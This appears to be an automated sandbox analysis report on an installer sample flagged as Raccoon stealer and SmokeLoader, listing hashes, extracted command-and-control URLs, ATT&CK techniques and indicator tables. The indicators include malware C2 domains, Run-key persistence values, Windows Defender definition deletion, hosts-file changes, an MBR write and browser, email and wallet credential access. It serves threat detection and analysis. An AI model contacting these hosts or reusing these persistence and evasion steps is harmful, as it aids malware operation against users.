raccoon | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

Target

Install2.exe
Size

497KB
MD5

41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1

0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256

97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512

5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Score

10^/10

raccoon smokeloader backdoor bootkit facebook discovery evasion persistence phishing spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

mpcmdrun.exe

pid process

7796 mpcmdrun.exe
Detected facebook phishing page
phishing facebook
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

pid	process
7796	mpcmdrun.exe

Blocklisted process makes network request 64 IoCs

Processes:

MsiExec.exe

flow	pid	process
94	7808	MsiExec.exe
97	7808	MsiExec.exe
98	7808	MsiExec.exe
100	7808	MsiExec.exe
102	7808	MsiExec.exe
104	7808	MsiExec.exe
107	7808	MsiExec.exe
108	7808	MsiExec.exe
109	7808	MsiExec.exe
110	7808	MsiExec.exe
111	7808	MsiExec.exe
112	7808	MsiExec.exe
113	7808	MsiExec.exe
114	7808	MsiExec.exe
115	7808	MsiExec.exe
116	7808	MsiExec.exe
117	7808	MsiExec.exe
118	7808	MsiExec.exe
119	7808	MsiExec.exe
120	7808	MsiExec.exe
121	7808	MsiExec.exe
122	7808	MsiExec.exe
123	7808	MsiExec.exe
124	7808	MsiExec.exe
125	7808	MsiExec.exe
126	7808	MsiExec.exe
127	7808	MsiExec.exe
128	7808	MsiExec.exe
129	7808	MsiExec.exe
130	7808	MsiExec.exe
131	7808	MsiExec.exe
132	7808	MsiExec.exe
133	7808	MsiExec.exe
134	7808	MsiExec.exe
135	7808	MsiExec.exe
136	7808	MsiExec.exe
137	7808	MsiExec.exe
138	7808	MsiExec.exe
139	7808	MsiExec.exe
140	7808	MsiExec.exe
141	7808	MsiExec.exe
142	7808	MsiExec.exe
143	7808	MsiExec.exe
144	7808	MsiExec.exe
145	7808	MsiExec.exe
146	7808	MsiExec.exe
147	7808	MsiExec.exe
154	7808	MsiExec.exe
161	7808	MsiExec.exe
162	7808	MsiExec.exe
163	7808	MsiExec.exe
164	7808	MsiExec.exe
165	7808	MsiExec.exe
166	7808	MsiExec.exe
167	7808	MsiExec.exe
168	7808	MsiExec.exe
169	7808	MsiExec.exe
170	7808	MsiExec.exe
171	7808	MsiExec.exe
172	7808	MsiExec.exe
173	7808	MsiExec.exe
174	7808	MsiExec.exe
175	7808	MsiExec.exe
176	7808	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

Ultra.exeupdatewin2.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatewin2.exe

Executes dropped EXE 47 IoCs

Processes:

Install2.tmpUltra.exeultramediaburner.exeultramediaburner.tmpUltraMediaBurner.exeKixeshufadae.exeCyshupaelaenu.exe001.exeinstaller.exegpooe.exejfiag3g_gg.exejfiag3g_gg.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeaskinstall39.exesetup.exerequest2.exemain.exeSunLabsPlayer.exe005.exeifhwwyy.exejfiag3g_gg.exetoolspab1.exetoolspab1.exe42a25820.exejfiag3g_gg.exeparse.exeparse.exeparse.exedata_load.exedata_load.exelighteningplayer-cache-gen.exe4309.exe4BFF.exe51E9.exe588F.exe6472.exe6A4C.exe6472.exeupdatewin1.exeupdatewin1.exeupdatewin2.exe5.exe

pid	process
1984	Install2.tmp
368	Ultra.exe
880	ultramediaburner.exe
1000	ultramediaburner.tmp
1928	UltraMediaBurner.exe
868	Kixeshufadae.exe
1104	Cyshupaelaenu.exe
8532	001.exe
7628	installer.exe
5664	gpooe.exe
8260	jfiag3g_gg.exe
8760	jfiag3g_gg.exe
2476	AdvancedWindowsManager.exe
2504	AdvancedWindowsManager.exe
2540	AdvancedWindowsManager.exe
2576	AdvancedWindowsManager.exe
2324	AdvancedWindowsManager.exe
2880	AdvancedWindowsManager.exe
9844	askinstall39.exe
10068	setup.exe
3736	request2.exe
3812	main.exe
3880	SunLabsPlayer.exe
3944	005.exe
4064	ifhwwyy.exe
2908	jfiag3g_gg.exe
1164	toolspab1.exe
7824	toolspab1.exe
7908	42a25820.exe
8048	jfiag3g_gg.exe
5064	parse.exe
5080	parse.exe
5104	parse.exe
8780	data_load.exe
3440	data_load.exe
9984	lighteningplayer-cache-gen.exe
10028	4309.exe
10064	4BFF.exe
10096	51E9.exe
9932	588F.exe
10212	6472.exe
3660	6A4C.exe
3688	6472.exe
3908	updatewin1.exe
3868	updatewin1.exe
3624	updatewin2.exe
2500	5.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Loads dropped DLL 64 IoCs

Processes:

Install2.exeInstall2.tmpultramediaburner.exeultramediaburner.tmpinstaller.exegpooe.exeMsiExec.exeMsiExec.exeMsiExec.exetaskeng.exerequest2.exemain.exeSunLabsPlayer.exeifhwwyy.exetoolspab1.exetoolspab1.exe

pid	process
308	Install2.exe
1984	Install2.tmp
1984	Install2.tmp
1984	Install2.tmp
1984	Install2.tmp
880	ultramediaburner.exe
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
7628	installer.exe
7628	installer.exe
5664	gpooe.exe
5664	gpooe.exe
7628	installer.exe
5664	gpooe.exe
5664	gpooe.exe
8708	MsiExec.exe
8708	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7628	installer.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
7808	MsiExec.exe
4056	taskeng.exe
4056	taskeng.exe
4056	taskeng.exe
2496
4056	taskeng.exe
2516
4056	taskeng.exe
4056	taskeng.exe
4056	taskeng.exe
5144
2552
2588
7668
3736	request2.exe
3736	request2.exe
3812	main.exe
3880	SunLabsPlayer.exe
4064	ifhwwyy.exe
4064	ifhwwyy.exe
3880	SunLabsPlayer.exe
1164	toolspab1.exe
7824	toolspab1.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

3672 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3672	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Ultra.exegpooe.exe6472.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Necaecabewo.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8a6bb3f0-5ad8-4062-8c4f-33cb0719bd68\\6472.exe\" --AutoStart"	6472.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

powershell.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\KasperskyLab powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\KasperskyLab	powershell.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

installer.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

80 ip-api.com
273 api.2ip.ua
274 api.2ip.ua
282 api.2ip.ua
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

6A4C.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 6A4C.exe

flow	ioc
80	ip-api.com
273	api.2ip.ua
274	api.2ip.ua
282	api.2ip.ua

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	6A4C.exe

Drops file in System32 directory 4 IoCs

Processes:

rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

Processes:

main.exeparse.exeparse.exeparse.exe

pid	process
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
5064	parse.exe
5080	parse.exe
5104	parse.exe
5064	parse.exe
5104	parse.exe
5080	parse.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

toolspab1.exe51E9.exe

description	pid	process	target process
PID 1164 set thread context of 7824	1164	toolspab1.exe	toolspab1.exe
PID 10096 set thread context of 1324	10096	51E9.exe	AddInProcess32.exe

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exepowershell.exepowershell.exepowershell.exeUltra.exeultramediaburner.tmppowershell.exedata_load.exepowershell.exemsiexec.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files (x86)\ogdtzM	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\ogdtzM\cache.dat	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-BDRI0.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	SunLabsPlayer.exe

Drops file in Windows directory 32 IoCs

Processes:

msiexec.exe5.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC71.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID551.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC750.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID184.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID202.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b1d2.msi	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	5.exe
File opened for modification	C:\Windows\Installer\MSIC116.tmp	msiexec.exe
File created	C:\Windows\Installer\f75b1d4.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBB4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICE47.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC348.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC53D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b1d4.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB76.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBCCF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID106.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\f75b1d6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID280.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2CF.tmp	msiexec.exe
File created	C:\Windows\Installer\f75b1d2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB666.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBC32.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBD2D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBDBB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID35C.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

9200 2500 WerFault.exe 5.exe

pid	pid_target	process	target process
9200	2500	WerFault.exe	5.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspab1.exe42a25820.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe

Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

10192 bitsadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

7924 taskkill.exe
4016 taskkill.exe

pid	process
10192	bitsadmin.exe

pid	process
7924	taskkill.exe
4016	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 902b3477f240d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A6701371-ACE5-11EB-8BB5-DE0F3C10814B} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "326903770"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
